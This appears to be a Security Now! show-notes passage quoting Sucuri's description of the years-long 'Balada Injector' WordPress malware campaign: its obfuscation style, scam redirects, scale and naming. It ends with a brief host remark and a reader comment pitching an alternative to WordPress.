Our team at Sucuri has been tracking a massive WordPress infection campaign since 2017 — but up until recently never bothered to give it a proper name. Typically, we refer to it as an ongoing long lasting massive WordPress infection campaign that leverages all known and recently discovered theme and plugin vulnerabilities. Other organizations and blogs have described it in a similar manner, sometimes adding terms like “malvertising campaign” or naming domains that it was currently using, which amount to several hundred over the past 6 years. This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites including fake tech support, fraudulent lottery wins, and more recently, push notification scams displaying bogus captcha pages asking users to “Please Allow to verify, that you are not a robot”. Since 2017, we estimate that over one million WordPress websites have been infected by this Security Now! #918 4 campaign. Each year it consistently ranks in the top 3 of the infections that we detect and clean from compromised websites. Last year, in 2022 alone, our external website scanner SiteCheck detected this malware over 141,000 times, with more than 67% of websites loading scripts from known Balada Injector domains. We currently have more than 100 signatures covering both front-end and back-end variations of the malware injected into server files and WordPress databases. As you can imagine, referring to this massive infection campaign using generic terms has not been convenient. However, assigning a name to this malware was never at the top of our priority list. Our security researchers deal with dozens of new malware samples every day, so we typically don’t dwell too much on well-known malware that is adequately covered by detection rules and only necessitates minor adjustments when we spot a new wave. In late December last year, our colleagues at Dr.Web shared some valuable information that led us to choose the name “Balada Injector”. A post published on December 30, 2022, titled “Linux backdoor malware infects WordPress-based websites” caught our attention, and it was widely circulated in Internet security blogs with titles like “Linux Malware uses 30 plugin vulnerabilities to target WordPress sites”. The article discusses two variants of the malware: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2 and provides a comprehensive overview, including targeted plugins and various indicators of compromise. The interest generated by this information prompted numerous inquiries from various sources, leading us to examine the post closely on New Year’s Eve to determine if immediate action was required. To our surprise, we instantly recognized the described malware as the ongoing, massive campaign we’d been tracking for years. Upon closer inspection, we found that the information provided was accurate, but the vulnerabilities, injected code, and malicious domains all dated back to 2019 and 2020. Nevertheless, the post offered interesting details about how campaign operators searched for vulnerable websites and injected malware. We soon obtained samples of the Linux binaries written in Go language from VirusTotal, where other security researchers had been creating collections. Most of the samples were compiled with debug information and even a simple “strings” command provided quite insightful information: names of functions, string constants, paths of files included in the project. These files consist mostly of source code for various Go libraries, providing additional functionality such as conversion functions and support for Internet protocols. However, the main malware code was located in the file C:/Users/host/Desktop/balada/client/main.go. The file path balada/client implied that the developer could refer to this software as Balada Client (we know that the malware sends data to C2 server so there could be a Balada Server part too). Whether our assumptions were correct or not, we adopted this name internally and think that it provides some convenience when talking about a really long lasting malware campaign. In many languages, Balada means “Ballad”. To avoid ambiguity, we added the word Injector to reflect the nature of the malware campaign that injects malicious code into WordPress sites, hence Balada Injector.
So, some interesting background about a long-lived multi-year — as in six years and counting — highly aggressive and effective focused campaign against WordPress sites. It’s easy to become inured to big numbers, but one million individually infected WordPress sites is a lot of sites. So I wanted to cover this now, since I suspect this won't be the last we're hearing about this quite determined Balada Injector WordPress malware.
Just because every othe seems to be using word press it does not mean its the best to use its full of security bugs and privacy issues and off the sheves software like this is a big target for hackers and there is a bigger target and reward once hacked. maybe its time to change if so we can help